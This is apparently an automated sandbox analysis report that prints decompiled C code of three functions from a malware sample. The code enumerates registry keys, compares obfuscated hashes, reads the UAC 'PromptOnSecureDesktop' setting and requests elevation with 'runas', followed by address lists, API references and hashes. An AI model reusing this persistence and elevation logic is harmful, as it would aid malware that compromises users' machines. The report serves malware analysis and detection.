Instruction Fuzzy Hash: 8031EEB2900108BFDF00EFA09D45ADF7F78AF48310F15807AE112F7291D674AAA08F69

Uniqueness

Uniqueness Score: -1.00%

Function 004073FF, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 345
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x61616161) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12);
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16);
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x61616161;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12);
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20); // executed
					L66:
					return _t93 | 0xffffffff;
				}
			}

0x004073ff
0x00407408
0x0040740e
0x00407410
0x00407419
0x0040741b
0x0040741b
0x0040741d
0x00407422
0x00407424
0x00407424
0x00407426
0x0040742b
0x0040742d
0x0040742d
0x00407430
0x00407435
0x00407437
0x00407437
0x0040743a
0x0040743f
0x00407451
0x00407464
0x00407469
0x00407472
0x00407478
0x0040747d
0x0040747e
0x00407481
0x004077f9
0x00000000
0x00407487
0x00407487
0x0040748c
0x0040748f
0x00407498
0x00407499
0x0040749c
0x00407703
0x00407706
0x0040770e
0x00000000
0x00000000
0x004074b1
0x004076ed
0x004076ed
0x004076f5
0x004076f6
0x004076ff
0x00407700
0x00000000
0x00407700
0x004074be
0x004074c8
0x004074cc
0x00000000
0x00000000
0x004074e6
0x004074e9
0x004074f0
0x004074f8
0x00407727
0x0040772a
0x00407755
0x0040775c
0x00407761
0x004076df
0x004076e2
0x004076e7
0x004076e7
0x00000000
0x004076e2
0x00407736
0x00407740
0x00407745
0x00407745
0x0040774b
0x0040774d
0x004077ec
0x004077ef
0x00000000
0x004077f5
0x0040751c
0x00407521
0x00407528
0x00407530
0x00000000
0x00000000
0x00407536
0x0040753c
0x0040753f
0x0040753f
0x00407541
0x00407542
0x0040754b
0x00000000
0x00000000
0x0040755f
0x00407565
0x00407566
0x0040756b
0x00000000
0x00000000
0x00407589
0x0040758e
0x00407593
0x00407753
0x00000000
0x00407753
0x004075a0
0x004075d1
0x004075d7
0x004075a2
0x004075b0
0x004075be
0x004075c3
0x004075c3
0x004075da
0x004075dc
0x004075dc
0x004075fc
0x00407615
0x00407618
0x0040761d
0x00407620
0x00407623
0x00407626
0x00407626
0x00407628
0x00407629
0x0040762d
0x00407632
0x00407634
0x00407634
0x00407637
0x00407637
0x00407639
0x0040763a
0x0040763e
0x00407642
0x0040765c
0x00407664
0x00407667
0x0040766e
0x00407673
0x00407680
0x00407675
0x0040767b
0x0040767b
0x0040768e
0x00407722
0x00000000
0x00407694
0x004076a1
0x004076ad
0x004076b3
0x004076bf
0x004076d8
0x004076d8
0x004076dd
0x004076dd
0x00000000
0x004076dd
0x004076c1
0x004076c7
0x00000000
0x0040777e
0x00407785
0x00407797
0x00407799
0x00407799
0x0040779a
0x0040779f
0x004077a1
0x004077a1
0x004077a3
0x004077a8
0x004077b3
0x004077b8
0x004077c0
0x004077c0
0x004077c8
0x004077d0
0x004077d6
0x004077d7
0x004077dc
0x004077de
0x004077de
0x004077e0
0x004077e2
0x00000000
0x004077e2
0x004076c7
0x00407769
0x00407773
0x004077e3
0x004077e6
0x00000000
0x004077e6
0x00407642
0x00407717
0x00407801
0x00000000
0x00407801

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,73B743E0,00000000), ref: 00407472
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004074F0
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,73B743E0,00000000), ref: 00407528
___ascii_stricmp.LIBCMT ref: 0040764D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004076E7
RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 00407717
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,73B743E0,00000000), ref: 00407745
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 004077EF

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
RegCloseKey.ADVAPI32(?), ref: 004077E6

Strings

PromptOnSecureDesktop, xrefs: 0040745E, 00407463, 0040747E, 0040751B, 0040757F, 004075FB, 00407614, 0040775B
", xrefs: 00407599

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "$PromptOnSecureDesktop
API String ID: 3433985886-3108538426
Opcode ID: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
Instruction ID: 7fe5a339a68ccf6b09c70fd716338511db9c3a0a85de510e5ec7ef93542d7acc
Opcode Fuzzy Hash: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
Instruction Fuzzy Hash: 10C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1044B7F504B72D1EA78AE908B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040704C, Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 332
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E0040704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				long _t94;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				int _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				void* _t166;
				int _t196;
				int _t202;
				void* _t203;
				void* _t204;
				void* _t206;
				void* _t207;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t94 = RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12); // executed
				if(_t94 != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??); // executed
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t206 = _t204 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t207 = _t206 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t207 = _t207 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											asm("popad");
											asm("popad");
											asm("popad");
											asm("popad");
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = 0x4122f8;
											_t166 = 0xad;
											_t123 = E00406C96(0x4122f8);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											__eflags = 0x6d - 0x3f;
											if(0x6d > 0x3f) {
												goto L57;
											}
											__eflags = 0xf8 - 0x10;
											if(0xf8 >= 0x10) {
												goto L57;
											}
											_t202 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t202;
											if(_t202 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t202 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t204 = _t206 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x61616161;
						__eflags = _t158 - (_v32 ^ 0x61616161);
						if(_t158 == (_v32 ^ 0x61616161)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12); // executed
					goto L21;
				}
			}

0x00407055
0x00407058
0x0040705a
0x00407061
0x00407068
0x00407071
0x00407073
0x00407073
0x00407075
0x0040707a
0x0040707c
0x0040707c
0x0040707e
0x00407083
0x00407085
0x00407085
0x00407087
0x0040708c
0x0040708e
0x0040708e
0x004070b4
0x004070b9
0x004070c2
0x004070ca
0x004071b8
0x004071c8
0x00000000
0x004070d0
0x004070d0
0x004070d8
0x004070df
0x004070e3
0x004070e4
0x004070e9
0x004070ed
0x004070ee
0x004070f1
0x004070f2
0x004070f5
0x0040719b
0x0040719e
0x004071a9
0x00000000
0x00000000
0x004070fb
0x004070fd
0x0040716e
0x0040716e
0x0040716e
0x0040716e
0x00407174
0x0040717b
0x0040717f
0x00407180
0x00407185
0x00407189
0x0040718a
0x0040718d
0x00407194
0x00000000
0x00407194
0x004070ff
0x00407102
0x00000000
0x00000000
0x00407104
0x00407107
0x00000000
0x00000000
0x00407109
0x0040710d
0x00000000
0x00000000
0x00407123
0x00407128
0x0040712d
0x0040712f
0x0040712f
0x00407130
0x00407133
0x004071d0
0x004071f4
0x004071f7
0x004071fc
0x004071ff
0x00407203
0x00407227
0x0040722e
0x0040723e
0x0040724c
0x00407251
0x00407254
0x00407256
0x00407258
0x00407258
0x00407256
0x00407280
0x00407282
0x0040728a
0x0040728c
0x004072c2
0x004072c9
0x004072cb
0x004072e6
0x004072e8
0x004072ef
0x004072f2
0x004072f4
0x00407301
0x00407301
0x00407301
0x004072f6
0x004072fc
0x004072fc
0x00407307
0x0040730d
0x0040730f
0x00407335
0x00407336
0x00407337
0x00407338
0x00407339
0x0040733e
0x0040734b
0x0040734e
0x00407354
0x0040735b
0x0040735d
0x004073d5
0x004073d8
0x004073de
0x004073e2
0x004073eb
0x004073f1
0x004073f2
0x004073f4
0x004073f7
0x00000000
0x004073f7
0x00407362
0x00407365
0x00000000
0x00000000
0x0040736d
0x00407370
0x00000000
0x00000000
0x00407372
0x00407375
0x0040737a
0x0040737c
0x0040738d
0x00407393
0x00407395
0x00407397
0x00407397
0x00407395
0x0040739d
0x004073a0
0x004073a2
0x004073a4
0x004073a4
0x004073a6
0x004073a9
0x004073b2
0x004073b8
0x004073b9
0x004073bc
0x004073c4
0x004073ca
0x004073cb
0x004073cd
0x00000000
0x00407311
0x00407314
0x0040731a
0x0040731d
0x00407326
0x0040732c
0x0040732d
0x00000000
0x0040732d
0x0040730f
0x004072d0
0x004072d6
0x00000000
0x0040728e
0x00407291
0x00407297
0x0040729a
0x004072a3
0x004072a9
0x004072aa
0x004072aa
0x004072ac
0x004072af
0x004072b2
0x004071cb
0x004071cf
0x004071cf
0x0040728c
0x00407208
0x0040720e
0x00407212
0x0040721b
0x00407221
0x00407224
0x00000000
0x00407224
0x0040713d
0x00407142
0x00407143
0x00407145
0x0040715e
0x00407166
0x0040716b
0x00000000
0x0040716b
0x0040714b
0x00407154
0x0040715a
0x0040715c
0x00000000
0x00000000
0x00000000
0x0040715c
0x004071b2
0x00000000
0x004071b2

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,73B743E0,?,73B743E0,00000000), ref: 004070C2
RegEnumValueA.KERNELBASE(73B743E0,00000000,?,00000020,00000000,00000000,00000000,0000012C), ref: 0040719E
RegCloseKey.KERNELBASE(73B743E0,?,73B743E0,00000000), ref: 004071B2
RegCloseKey.ADVAPI32(73B743E0), ref: 00407208
RegCloseKey.ADVAPI32(73B743E0), ref: 00407291
___ascii_stricmp.LIBCMT ref: 004072C2
RegCloseKey.ADVAPI32(73B743E0), ref: 004072D0
RegCloseKey.ADVAPI32(73B743E0), ref: 00407314
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
RegCloseKey.ADVAPI32(73B743E0), ref: 004073D8

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD

Strings

PromptOnSecureDesktop, xrefs: 004070AE, 004070B3, 00407118, 00407165, 004071BF, 004071D9, 004071F3, 00407264, 0040727F, 0040734A
", xrefs: 00407227
, xrefs: 00407194

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
String ID: $"$PromptOnSecureDesktop
API String ID: 4293430545-98143240
Opcode ID: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
Instruction ID: 42610d5d4912e138811464987e42a56107d9bf2f6382ea6b9d81aa24fc4965e2
Opcode Fuzzy Hash: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
Instruction Fuzzy Hash: B5B17071D08209BAEB159FA1DC45BEF77B8AB04304F20047BF501F61D1EB79AA94CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409326, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 284
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				long _t107;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161); // executed
						L39:
						_t96 = E004091EB(); // executed
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x61080000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				_t107 = RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50); // executed
				if(_t107 == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c); // executed
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c); // executed
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x61080106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x61080107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x61080000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}

0x00409326
0x00409327
0x00409330
0x00409339
0x00409348
0x00409358
